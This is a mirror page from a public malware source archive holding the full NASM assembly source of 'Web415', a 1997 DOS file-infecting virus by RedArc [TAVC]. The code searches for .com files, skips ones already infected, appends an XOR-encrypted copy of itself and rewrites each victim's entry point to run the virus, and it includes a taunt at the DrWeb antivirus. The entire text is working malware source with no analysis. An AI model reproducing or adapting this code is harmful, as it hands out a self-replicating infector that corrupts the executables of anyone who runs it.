mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-20 22:18:28 +00:00
233 lines
3.8 KiB
NASM
233 lines
3.8 KiB
NASM
;----------------------------------------------------------------------------
|
|
; ‚¨àãá Web415
|
|
; ‘¥¬¥©á⢮ Search
|
|
;----------------------------------------------------------------------------
|
|
; (c) 1997 by I. Dikshew // [TAVC] // -=* Red Arc *=-
|
|
;----------------------------------------------------------------------------
|
|
|
|
Model Tiny
|
|
.Code
|
|
.286
|
|
org 100h
|
|
start:
|
|
push cs
|
|
push offset Entry
|
|
retf
|
|
db 'DrWeb - £®à¡ãå !'
|
|
BEG_LEN equ $-start
|
|
Entry:
|
|
pusha
|
|
push ds
|
|
push es
|
|
call En1
|
|
EN_LEN equ $-Entry
|
|
En1:
|
|
push ds
|
|
pop es
|
|
xchg ax,di
|
|
pop bp
|
|
sub bp,EN_LEN
|
|
mov bx,1100h
|
|
mov ah,4ah
|
|
int 21h
|
|
jnc ALLOCATED
|
|
Exit_Proc:
|
|
pop es
|
|
pop ds
|
|
popa
|
|
push cs
|
|
push si
|
|
retf
|
|
ALLOCATED:
|
|
mov ax,LBL
|
|
add ax,bp
|
|
mov cl,4
|
|
shr ax,cl
|
|
inc ax
|
|
push ds
|
|
pop bx
|
|
add ax,bx
|
|
push ax
|
|
push cs
|
|
pop ds
|
|
pop es
|
|
LBL10:
|
|
mov si, bp
|
|
cld
|
|
xor cx,cx
|
|
add si, Crypt_Start
|
|
LBL0:
|
|
mov ax,word ptr ds:[si]
|
|
inc cx
|
|
mov bx,word ptr ds:[si+2]
|
|
inc cx
|
|
xchg ah,al
|
|
inc cx
|
|
xchg bh,bl
|
|
inc cx
|
|
xchg ax,bx
|
|
xor ax,0BEBEh
|
|
xor bx,0BEBEh
|
|
mov word ptr ds:[si],ax
|
|
mov word ptr ds:[si+2],bx
|
|
add si,4
|
|
cmp cx, Crypt_LEN
|
|
jge LBL1
|
|
jmp short LBL0
|
|
LBL1:
|
|
Crypt_Start equ $-Entry
|
|
mov ah,1ah
|
|
mov dx,bp
|
|
add dx,Crypt_End
|
|
mov bx,dx
|
|
int 21h
|
|
push es
|
|
push cs
|
|
pop es
|
|
mov di,100h
|
|
mov si,bp
|
|
add si,Old_BEGIN
|
|
mov cx,BEG_LEN
|
|
rep movsb
|
|
pop es
|
|
mov byte ptr ds:[bp+Count],0
|
|
cld
|
|
mov ah,4eh
|
|
mov cx, 20h
|
|
mov dx,bp
|
|
add dx,C_Mask
|
|
Interrupt:
|
|
int 21h
|
|
jb Not_Found
|
|
jmp Test_File
|
|
Not_Found:
|
|
mov ah,1ah
|
|
mov dx,80h
|
|
int 21h
|
|
jmp Exit_Proc
|
|
Test_File:
|
|
push bx
|
|
add bx,1ah
|
|
mov ax,[bx]
|
|
and ax,0f000h
|
|
cmp ax,0f000h
|
|
jnz Len_Tested
|
|
Find_Next:
|
|
pop bx
|
|
mov ah,4fh
|
|
jmp Short Interrupt
|
|
Len_Tested:
|
|
add bx,04h
|
|
xchg dx,bx
|
|
mov ax,3d02h
|
|
int 21h
|
|
xchg ax,bx
|
|
mov ah,3fh
|
|
mov cx,BEG_LEN
|
|
mov dx,bp
|
|
add dx,Old_BEGIN
|
|
push dx
|
|
int 21h
|
|
pop si
|
|
cmp byte ptr ds:[si+14h],'!'
|
|
je Close_File
|
|
jmp short Uses_File
|
|
Close_File:
|
|
mov ah,3eh
|
|
int 21h
|
|
mov al,byte ptr ds:[bp+Count]
|
|
cmp al,1
|
|
jne Find_Next
|
|
pop bx
|
|
jmp Not_Found
|
|
Uses_File:
|
|
mov ax,4202h
|
|
xor cx,cx
|
|
xor dx,dx
|
|
int 21h
|
|
push ax
|
|
cld
|
|
mov si,bp
|
|
xor di,di
|
|
mov cx, Crypt_End / 2
|
|
rep movsw
|
|
pusha
|
|
push es
|
|
pop ds
|
|
xor cx,cx
|
|
mov si, Crypt_Start
|
|
LBL_0:
|
|
mov ax,word ptr ds:[si]
|
|
inc cx
|
|
mov bx,word ptr ds:[si+2]
|
|
inc cx
|
|
xchg ah,al
|
|
inc cx
|
|
xchg bh,bl
|
|
inc cx
|
|
xchg ax,bx
|
|
xor ax,0BEBEh
|
|
xor bx,0BEBEh
|
|
mov word ptr ds:[si],ax
|
|
mov word ptr ds:[si+2],bx
|
|
add si,4
|
|
cmp cx, Crypt_LEN
|
|
jge LBL_1
|
|
jmp short LBL_0
|
|
LBL_1:
|
|
popa
|
|
mov ah,40h
|
|
mov cx,Crypt_End
|
|
xor dx,dx
|
|
int 21h
|
|
mov ax,4200h
|
|
xor cx,cx
|
|
xor dx,dx
|
|
int 21h
|
|
push cs
|
|
pop ds
|
|
pop ax
|
|
pop si
|
|
push si
|
|
mov di,bp
|
|
add ax,100h
|
|
add di,New1
|
|
inc di
|
|
mov [di],ax
|
|
mov ah,40h
|
|
mov dx,bp
|
|
add dx,New_BEGIN
|
|
mov cx,BEG_LEN
|
|
int 21h
|
|
mov byte ptr ds:[bp+Count],1
|
|
jmp Close_File
|
|
|
|
C_MASK equ $-Entry
|
|
db '*.com',0h
|
|
|
|
New_BEGIN equ $-Entry
|
|
push cs
|
|
LI:
|
|
New1 equ $-Entry
|
|
push offset Entry
|
|
retf
|
|
Apll equ $-Entry
|
|
Rems equ $-LI
|
|
db 'DrWeb - £®à¡ãå !'
|
|
|
|
Old_BEGIN equ $-Entry
|
|
db 0c3h
|
|
db BEG_LEN-1 dup (90h)
|
|
|
|
Count equ $-Entry
|
|
db ?
|
|
|
|
db 'RedArc // [TAVC]'
|
|
|
|
Crypt_End equ $-Entry
|
|
Crypt_LEN equ $-LBL1
|
|
|
|
LBL equ $-Entry
|
|
|
|
end start
|